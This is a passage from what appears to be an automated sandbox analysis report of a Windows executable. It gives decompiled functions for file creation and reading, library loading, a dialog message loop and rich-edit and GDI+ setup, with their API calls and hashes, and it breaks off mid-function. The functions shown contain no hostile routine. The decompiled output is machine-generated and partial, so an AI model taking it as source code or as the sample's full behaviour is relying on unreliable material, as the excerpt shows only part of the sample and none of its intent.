                0x003faac5
                0x003faaca
                0x003faae5
                0x003faae7
                0x003faaf1
                0x003faaf3
                0x003faaf4
                0x003faaf6
                0x00000000
                0x00000000
                0x003faaf8
                0x003faafe
                0x003faafe
                0x00000000
                0x003faafe
                0x003faacc
                0x003faace
                0x003faad2
                0x003faad7
                0x003faad9
                0x003faadb
                0x00000000
                0x00000000
                0x003faadd
                0x00000000
                0x003faadd
                0x003faa73
                0x003faa78
                0x00000000
                0x00000000
                0x003faa7e
                0x003faa80
                0x00000000
                0x00000000
                0x003faa9c
                0x003faaa0
                0x00000000
                0x00000000
                0x00000000
                0x003faaa6
                0x003fa9d9
                0x003fa9db
                0x003fa9dd
                0x003fa9e5
                0x003faa04
                0x003faa06
                0x003faa10
                0x003faa12
                0x003faa13
                0x003faa15
                0x00000000
                0x00000000
                0x003faa1b
                0x003faa21
                0x003faa21
                0x00000000
                0x003faa21
                0x003fa9e9
                0x003fa9ed
                0x003fa9f2
                0x003fa9f6
                0x00000000
                0x00000000
                0x003fa9fc
                0x00000000
                0x003fa9fc

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003F57FB,003F57FB,?,?,?,003FABAC,00000001,00000001,2DE85006), ref: 003FA9B5
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003FABAC,00000001,00000001,2DE85006,?,?,?), ref: 003FAA3B
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003FAB35
                • __freea.LIBCMT ref: 003FAB42
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • __freea.LIBCMT ref: 003FAB4B
                • __freea.LIBCMT ref: 003FAB70
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 9fc26ebea9741085bd4b30af44f0aede9f44a8efa66ff4810f89bfa97ae5cb06
                • Instruction ID: 7b64cf2be389dab11805a2819a20ef677f2eb25f92ea29ab8ea9f7c8b08932a1
                • Opcode Fuzzy Hash: 9fc26ebea9741085bd4b30af44f0aede9f44a8efa66ff4810f89bfa97ae5cb06
                • Instruction Fuzzy Hash: 8B51D5B2610A1AAFDB278F64CC41EBBB7AAEF44710F164629FE08DA150DB34DC50D691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 994 3eabab-3eabca GetClassNameW 995 3eabcc-3eabe1 call 3e1fbb 994->995 996 3eabf2-3eabf4 994->996 1001 3eabe3-3eabef FindWindowExW 995->1001 1002 3eabf1 995->1002 998 3eabff-3eac01 996->998 999 3eabf6-3eabf8 996->999 999->998 1001->1002 1002->996
                C-Code - Quality: 100%
                			E003EABAB(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E003E1FBB( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                0x003eabbb
                0x003eabc2
                0x003eabca
                0x003eabcd
                0x003eabda
                0x003eabe1
                0x003eabe9
                0x003eabef
                0x003eabef
                0x003eabf1
                0x003eabf4
                0x003eabf9
                0x00000000
                0x003eabf9
                0x003eac01

                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 003EABC2
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 003EABF9
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 003EABE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT$pl%w
                • API String ID: 4243998846-2708917214
                • Opcode ID: d7312bfa8862777792f809a7ec846ec3cf853dbb3998ac44831c798b0d50dbda
                • Instruction ID: ef0c29591180c4009a86ebe89af77b86925e52311f0d003cc2b44e09111b9d54
                • Opcode Fuzzy Hash: d7312bfa8862777792f809a7ec846ec3cf853dbb3998ac44831c798b0d50dbda
                • Instruction Fuzzy Hash: 9AF0E23260063976DB215A659C09F9B72BC9B82B01F094121BA00B30C4D760EA4185BA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1003 3d98e0-3d9901 call 3eec50 1006 3d990c 1003->1006 1007 3d9903-3d9906 1003->1007 1009 3d990e-3d991f 1006->1009 1007->1006 1008 3d9908-3d990a 1007->1008 1008->1009 1010 3d9927-3d9931 1009->1010 1011 3d9921 1009->1011 1012 3d9936-3d9943 call 3d6edb 1010->1012 1013 3d9933 1010->1013 1011->1010 1016 3d994b-3d996a CreateFileW 1012->1016 1017 3d9945 1012->1017 1013->1012 1018 3d996c-3d998e GetLastError call 3dbb03 1016->1018 1019 3d99bb-3d99bf 1016->1019 1017->1016 1024 3d99c8-3d99cd 1018->1024 1027 3d9990-3d99b3 CreateFileW GetLastError 1018->1027 1021 3d99c3-3d99c6 1019->1021 1023 3d99d9-3d99de 1021->1023 1021->1024 1025 3d99ff-3d9a10 1023->1025 1026 3d99e0-3d99e3 1023->1026 1024->1023 1028 3d99cf 1024->1028 1030 3d9a2e-3d9a39 1025->1030 1031 3d9a12-3d9a2a call 3e0602 1025->1031 1026->1025 1029 3d99e5-3d99f9 SetFileTime 1026->1029 1027->1021 1032 3d99b5-3d99b9 1027->1032 1028->1023 1029->1025 1031->1030 1032->1021
                C-Code - Quality: 97%
                			E003D98E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
				struct _FILETIME _v0;
				char _t38;
				void* _t40;
				long _t52;
				unsigned int _t53;
				long _t56;
				signed int _t57;
				void* _t61;
				void* _t62;
				long _t68;
				void* _t70;

				_t62 = __esi;
				E003EEC50(0x1050);
				_t53 = _a4184;
				_t61 = __ecx;
				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
					_t38 = 1;
				} else {
					_t38 = 0;
				}
				_push(_t62);
				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
				if((_t53 & 0x00000001) != 0) {
					_t68 = _t68 | 0x40000000;
				}
				_t56 =  !(_t53 >> 3) & 0x00000001;
				if(_t38 != 0) {
					_t56 = _t56 | 0x00000002;
				}
				E003D6EDB( &_a8);
				if( *((char*)(_t61 + 0x24)) != 0) {
					_t68 = _t68 | 0x00000100;
				}
				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
				_t70 = _t40;
				if(_t70 != 0xffffffff) {
					goto L15;
				} else {
					_v0.dwLowDateTime = GetLastError();
					if(E003DBB03(_a4180,  &_a8, 0x800) == 0) {
						L16:
						if(_v0.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
						}
						L18:
						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
							_a4 = _a4 | 0xffffffff;
							SetFileTime(_t70, 0,  &_v0, 0);
						}
						 *((char*)(_t61 + 0x1c)) = 0;
						 *((intOrPtr*)(_t61 + 0x10)) = 0;
						_t30 = _t70 != 0xffffffff;
						_t57 = _t56 & 0xffffff00 | _t30;
						 *((char*)(_t61 + 0x15)) = 0;
						if(_t30 != 0) {
							 *(_t61 + 8) = _t70;
							E003E0602(_t61 + 0x32, _a4180, 0x800);
							 *((char*)(_t61 + 0x25)) = 0;
						}
						return _t57;
					}
					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
					_t52 = GetLastError();
					if(_t52 == 2) {
						_v0.dwLowDateTime = _t52;
					}
					L15:
					if(_t70 != 0xffffffff) {
						goto L18;
					}
					goto L16;
				}
			}














                0x003d98e0
                0x003d98e5
                0x003d98eb
                0x003d98f4
                0x003d98f6
                0x003d9901
                0x003d990c
                0x003d9908
                0x003d9908
                0x003d9908
                0x003d990e
                0x003d9919
                0x003d991f
                0x003d9921
                0x003d9921
                0x003d992c
                0x003d9931
                0x003d9933
                0x003d9933
                0x003d993a
                0x003d9943
                0x003d9945
                0x003d9945
                0x003d995f
                0x003d9965
                0x003d996a
                0x00000000
                0x003d996c
                0x003d9972
                0x003d998e
                0x003d99c8
                0x003d99cd
                0x003d99cf
                0x003d99cf
                0x003d99d9
                0x003d99de
                0x003d99e5
                0x003d99ee
                0x003d99f9
                0x003d99f9
                0x003d9a04
                0x003d9a07
                0x003d9a0a
                0x003d9a0a
                0x003d9a0d
                0x003d9a10
                0x003d9a21
                0x003d9a25
                0x003d9a2a
                0x003d9a2a
                0x003d9a39
                0x003d9a39
                0x003d99a8
                0x003d99aa
                0x003d99b3
                0x003d99b5
                0x003d99b5
                0x003d99c3
                0x003d99c6
                0x00000000
                0x00000000
                0x00000000
                0x003d99c6

                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,003D7760,?,00000005,?,00000011), ref: 003D995F
                • GetLastError.KERNEL32(?,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D996C
                • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,003D7760,?,00000005,?), ref: 003D99A2
                • GetLastError.KERNEL32(?,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D99AA
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D99F9
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 500fbe14f67f44ad972928877108aeb989e8255ae5b2ec441ec3ec0c02f358b1
                • Instruction ID: 516bdbedbb3bceeaff90b7b084f9fa45d49b40845a7e5d193f6a9ac5b98d4d63
                • Opcode Fuzzy Hash: 500fbe14f67f44ad972928877108aeb989e8255ae5b2ec441ec3ec0c02f358b1
                • Instruction Fuzzy Hash: D9315732544341AFE7329F20ED46BDABBD8BB05320F210B1FF9A0962C0D3B4A954CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1062 3eb568-3eb581 PeekMessageW 1063 3eb5bc-3eb5be 1062->1063 1064 3eb583-3eb597 GetMessageW 1062->1064 1065 3eb5a8-3eb5b6 TranslateMessage DispatchMessageW 1064->1065 1066 3eb599-3eb5a6 IsDialogMessageW 1064->1066 1065->1063 1066->1063 1066->1065
                C-Code - Quality: 100%
                			E003EB568() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x418458; // 0x303f2
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                0x003eb579
                0x003eb581
                0x003eb58a
                0x003eb590
                0x003eb597
                0x003eb5a8
                0x003eb5ac
                0x003eb5b6
                0x00000000
                0x003eb5b6
                0x003eb59e
                0x003eb5a6
                0x00000000
                0x00000000
                0x003eb5a6
                0x003eb5be

                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                • IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                • TranslateMessage.USER32(?), ref: 003EB5AC
                • DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 597260089bf95e0ea880c6e79ab3534844680068a226b72aba9d92fd252ac7c7
                • Instruction ID: 021afacfdb143427096a8cb8c62fb8dc1de7f0e11f2276416104c6d7ae41785b
                • Opcode Fuzzy Hash: 597260089bf95e0ea880c6e79ab3534844680068a226b72aba9d92fd252ac7c7
                • Instruction Fuzzy Hash: A4F03071A0116AABCB219FE2DC4CDDBBFBCEE053927004424B905D2094EB34E605CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 25%
                			E003EAC16(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E003E081B(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x433174(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x433034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L003EEB2C(); // executed
				 *0x433090(0x418438,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                0x003eac25
                0x003eac2c
                0x003eac2f
                0x003eac38
                0x003eac40
                0x003eac47
                0x003eac51
                0x003eac5c
                0x003eac60
                0x003eac63
                0x003eac66
                0x003eac70
                0x003eac7b

                APIs
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • OleInitialize.OLE32(00000000), ref: 003EAC2F
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003EAC66
                • SHGetMalloc.SHELL32(00418438), ref: 003EAC70
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 1fcc78dcf0a6cf5f1a3f9c245e0490a46cd4acb96e2a878b277599fa7d829b63
                • Instruction ID: e875ef501408aef6ee5c0f16a0cad6f8cbf6abe84f5393b91e307deddb987787
                • Opcode Fuzzy Hash: 1fcc78dcf0a6cf5f1a3f9c245e0490a46cd4acb96e2a878b277599fa7d829b63
                • Instruction Fuzzy Hash: 28F062B1D00219ABCB10AFA9D9499DFFFFCEF84701F00412AE441E2241DBB856458FA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1071 3d9785-3d9791 1072 3d979e-3d97b5 ReadFile 1071->1072 1073 3d9793-3d979b GetStdHandle 1071->1073 1074 3d97b7-3d97c0 call 3d98bc 1072->1074 1075 3d9811 1072->1075 1073->1072 1079 3d97d9-3d97dd 1074->1079 1080 3d97c2-3d97ca 1074->1080 1077 3d9814-3d9817 1075->1077 1082 3d97df-3d97e8 GetLastError 1079->1082 1083 3d97ee-3d97f2 1079->1083 1080->1079 1081 3d97cc 1080->1081 1086 3d97cd-3d97d7 call 3d9785 1081->1086 1082->1083 1087 3d97ea-3d97ec 1082->1087 1084 3d980c-3d980f 1083->1084 1085 3d97f4-3d97fc 1083->1085 1084->1077 1085->1084 1088 3d97fe-3d9807 GetLastError 1085->1088 1086->1077 1087->1077 1088->1084 1090 3d9809-3d980a 1088->1090 1090->1086
                C-Code - Quality: 59%
                			E003D9785(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E003D98BC(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E003D9785(_t25);
						}
					}
				}
				return _t15;
			}







                0x003d9788
                0x003d978a
                0x003d9791
                0x003d979b
                0x003d979b
                0x003d97ad
                0x003d97b5
                0x003d9811
                0x003d97b7
                0x003d97b9
                0x003d97c0
                0x003d97d9
                0x003d97dd
                0x003d97ee
                0x003d97f2
                0x003d980c
                0x003d980c
                0x003d97fe
                0x003d97fe
                0x003d9807
                0x00000000
                0x003d9809
                0x003d9809
                0x00000000
                0x003d9809
                0x003d9807
                0x003d97df
                0x003d97df
                0x003d97e8
                0x00000000
                0x003d97ea
                0x003d97ea
                0x003d97ea
                0x003d97e8
                0x003d97c2
                0x003d97c2
                0x003d97ca
                0x00000000
                0x003d97cc
                0x003d97cc
                0x003d97cd
                0x003d97cd
                0x003d97d2
                0x003d97d2
                0x003d97ca
                0x003d97c0
                0x003d9817

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 003D9795
                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003D97AD
                • GetLastError.KERNEL32 ref: 003D97DF
                • GetLastError.KERNEL32 ref: 003D97FE
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 9fa0c2eeb7d917da346a24c3d7cdf2d31740f882df1be0746fae87287d7d781c
                • Instruction ID: 21abe6ab06700ad0596fb5c6aced076f66c38cdd9faef5cca3d007cb93246c2d
                • Opcode Fuzzy Hash: 9fa0c2eeb7d917da346a24c3d7cdf2d31740f882df1be0746fae87287d7d781c
                • Instruction Fuzzy Hash: 7C110832910204EBCF225F64EC047693BACFB02721F11852BF816D5790D770CE44EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1092 3fad34-3fad48 1093 3fad4a-3fad53 1092->1093 1094 3fad55-3fad70 LoadLibraryExW 1092->1094 1095 3fadac-3fadae 1093->1095 1096 3fad99-3fad9f 1094->1096 1097 3fad72-3fad7b GetLastError 1094->1097 1100 3fada8 1096->1100 1101 3fada1-3fada2 FreeLibrary 1096->1101 1098 3fad7d-3fad88 LoadLibraryExW 1097->1098 1099 3fad8a 1097->1099 1102 3fad8c-3fad8e 1098->1102 1099->1102 1103 3fadaa-3fadab 1100->1103 1101->1100 1102->1096 1104 3fad90-3fad97 1102->1104 1103->1095 1104->1103
                C-Code - Quality: 95%
                			E003FAD34(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x4325d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x4073f0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xc24f6282
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                0x003fad39
                0x003fad3d
                0x003fad44
                0x003fad48
                0x003fad56
                0x003fad66
                0x003fad6c
                0x003fad70
                0x003fad99
                0x003fad9b
                0x003fad9f
                0x003fada2
                0x003fada2
                0x003fada8
                0x003fadaa
                0x00000000
                0x003fadab
                0x003fad72
                0x003fad7b
                0x003fad8a
                0x003fad7d
                0x003fad80
                0x003fad86
                0x003fad86
                0x003fad8e
                0x00000000
                0x003fad90
                0x003fad93
                0x003fad95
                0x00000000
                0x003fad95
                0x003fad8e
                0x003fad4a
                0x003fad4f
                0x00000000

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,003F40EF,00000000,00000000,?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue), ref: 003FAD66
                • GetLastError.KERNEL32(?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue,00407970,FlsSetValue,00000000,00000364,?,003F98B7), ref: 003FAD72
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003FACDB,003F40EF,00000000,00000000,00000000,?,003FAED8,00000006,FlsSetValue,00407970,FlsSetValue,00000000), ref: 003FAD80
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: f490fc4a30220672585ed451767880516977fec5ae306e4119bfcb0435b13ac0
                • Instruction ID: 16e807b949a502177e2071c7e89616f5c357d80bed10d22da5054c6cf4060030
                • Opcode Fuzzy Hash: f490fc4a30220672585ed451767880516977fec5ae306e4119bfcb0435b13ac0
                • Instruction Fuzzy Hash: FD014776211A2AABC7234F689C54A677F5CEF047A37120230FE0AE3561C730D801C6E5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E003FBA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_t68 = __edx;
				_v8 = E003F97E5(__ebx, __ecx, __edx);
				E003FBB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
				_t31 = E003FB7BB(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
